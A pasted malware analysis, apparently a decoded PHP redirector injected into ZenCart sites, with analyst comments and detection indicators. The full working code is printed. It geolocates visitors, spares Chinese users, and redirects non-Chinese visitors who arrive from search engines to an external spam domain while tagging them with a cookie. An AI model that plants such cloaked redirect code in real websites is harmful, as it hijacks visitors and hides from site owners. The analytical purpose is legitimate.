
Untitled

a guest
May 5th, 2014
/* new version of the decoded malware.
   Check http://blog.sucuri.net/2014/02/mysterious-zencart-redirects-leverage-http-headers.html for details

   Analyst summary, from the code in this listing: a conditional redirector.
   It geolocates the visitor through a third-party API, leaves visitors
   geolocated to CN alone, and sends visitors who arrive with a search-engine
   referrer to an external URL. Visitors it has evaluated are tagged with a
   USERID cookie.
*/
// 7 == E_ERROR | E_WARNING | E_PARSE, so notices are not reported.
error_reporting(7);
// The same two strings are written literally into the USERID cookie further
// down; the variables themselves are not referenced again in this listing.
$check ="shine-check";
$check2 ="twotime";
$adsen_code ='';// insert Google ads (empty and unused in this listing)
$CookieTime=0;// not referenced in this listing; the setcookie() calls pass a literal 0
/**
 * Return the address the visitor claims to have.
 *
 * Order of preference: X-Forwarded-For, then Client-IP, then REMOTE_ADDR.
 * The first two are request headers, so the result is client-supplied text
 * that is returned without any validation; X-Forwarded-For may also carry a
 * comma-separated list rather than one address.
 *
 * @return mixed whatever string the chosen source holds
 */
function getIP()
{
    // Declared static, but never tested before being overwritten, so it
    // does not act as a cache between calls.
    static $realip;
    if (isset($_SERVER)){
        if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])){
            $realip = $_SERVER["HTTP_X_FORWARDED_FOR"];
        } else if (isset($_SERVER["HTTP_CLIENT_IP"])) {
            $realip = $_SERVER["HTTP_CLIENT_IP"];
        } else {
            $realip = $_SERVER["REMOTE_ADDR"];
        }
    } else {
        // Fallback when $_SERVER is not set: same order, read via getenv().
        if (getenv("HTTP_X_FORWARDED_FOR")){
            $realip = getenv("HTTP_X_FORWARDED_FOR");
        } else if (getenv("HTTP_CLIENT_IP")) {
            $realip = getenv("HTTP_CLIENT_IP");
        } else {
            $realip = getenv("REMOTE_ADDR");
        }
    }
 
 
    return $realip;
}
/**
 * Get the geographic location of an IP.
 * Uses the Taobao IP lookup API.
 *
 * Detection note: this is a server-side, plain-HTTP request to
 * ip.taobao.com made from the web server itself, so it shows up in egress
 * or proxy logs of an affected host.
 *
 * @param mixed $ip value from getIP(); concatenated into the URL unencoded
 * @Return: array the API's "data" object cast to an array, or false when
 *          the API answers with code '1'
 */
function getCity($ip)
{
    $url="http://ip.taobao.com/service/getIpInfo.php?ip=".$ip;
    // '@' hides fetch errors. A failed fetch makes json_decode() yield null,
    // which falls through to an empty array below (falsy for the caller).
    $ip=json_decode(@file_get_contents($url));  
    // This code treats code '1' as the API's failure answer.
    if((string)$ip->code=='1'){
       return false;
    }
    $data = (array)$ip->data;
    return $data;  
}
// Main flow: runs top to bottom on every request that reaches this code.
//
// Indicators visible in this listing: a USERID cookie with the value
// "shine-check" or "twotime", the outbound lookup to ip.taobao.com made by
// getCity(), and a Location header pointing at the URL assigned below.
$ip=getIP();
$data=getCity($ip);
// A falsy $data (API error or failed lookup) skips everything below:
// no cookie is set and no redirect happens.
if($data){
              if($data['country_id']=='CN'){ // check whether this is a Chinese IP
              // Visitors geolocated to CN are only tagged, never redirected.
              setcookie("USERID", "twotime", 0,"/","");
           }
       else
       {
         // Pool of candidate targets: indices 0-78 hold the redirect URL and
         // indices 80-99 hold a mailto: string. Index 79 is never assigned.
         $target_url=array();
//$target_url[0]="http";
for($i=0;$i<79;$i++)  
{
    $target_url[$i]="http://www.goodsellwholesaler.com";// change this to the URL you want to redirect to
}
for($i=80;$i<100;$i++)
{
    $target_url[$i]="mailto:hackseo@post.com";
}
// Hand-rolled shuffle: each element of $arr is dropped into a random slot
// that still compares equal to "", retrying (by stepping $i back) when the
// slot is taken. The generator is reseeded from microtime() on every pass.
// Declared inside this else-branch, so it only exists once the branch runs.
// It reads $arr[0..sizeof-1]; with the pool above that includes the unset
// index 79 and leaves out index 99.
function rand_array($arr)
{
    $arr_size=sizeof($arr);
    $tmp_arr=array();
    for($i=0;$i<$arr_size;$i++){
        mt_srand((double) microtime()*1000000);
        $rd=mt_rand(0,$arr_size-1);
        // Empty slots are unset keys here; the loose == "" test relies on
        // that read evaluating to null.
        if($tmp_arr[$rd]=="")
        {
            $tmp_arr[$rd]=$arr[$i];
        }
        else
        {
            $i=$i-1;
        }
    }
    return $tmp_arr;
}
$attack_url=rand_array($target_url);
$attackurl="www";
// Accept-Language is read without an isset() check.
$l1=$_SERVER["HTTP_ACCEPT_LANGUAGE"];
if(isset($_SERVER['HTTP_REFERER'])){
$a1 = $_SERVER['HTTP_REFERER'];
} else {
$a1 = '';
}
$l2="zh";
$a2="bing";
$a3="com.hk";
$a5="google";
$a4="yahoo";
// Cloaking condition. The redirect fires only when ALL of these hold:
//   - Accept-Language does not contain "zh" (strict === false test);
//   - the referrer does not contain "com.hk";
//   - the referrer contains "bing", "google" or "yahoo";
//   - shuffled slot 1 contains "www", i.e. holds the URL, not the mailto:
//     string. Roughly four in five pool entries are the URL.
// The loose ==true / ==false comparisons on strpos() treat a match at
// offset 0 as "not found"; only offsets above 0 count as a match.
// Consequence for responders: a direct visit with no search-engine referrer
// never shows the redirect, so its absence there does not show a site is clean.
if (( strpos($l1,$l2) === false )and( ( strpos($a1,$a3) == false ))and(( strpos($a1,$a2) == true )or( strpos($a1,$a5) == true )or( strpos($a1,$a4) == true )) and ( strpos($attack_url[1],$attackurl) == true )) {
// Tag the visitor, then queue the redirect. There is no exit after Header().
setcookie("USERID", "shine-check", 0,"/","");Header("Location: $attack_url[1]");}
else
{
// Every other non-CN visitor is tagged "twotime" and served normally.
setcookie("USERID", "twotime", 0,"/","");
}
       }
   
}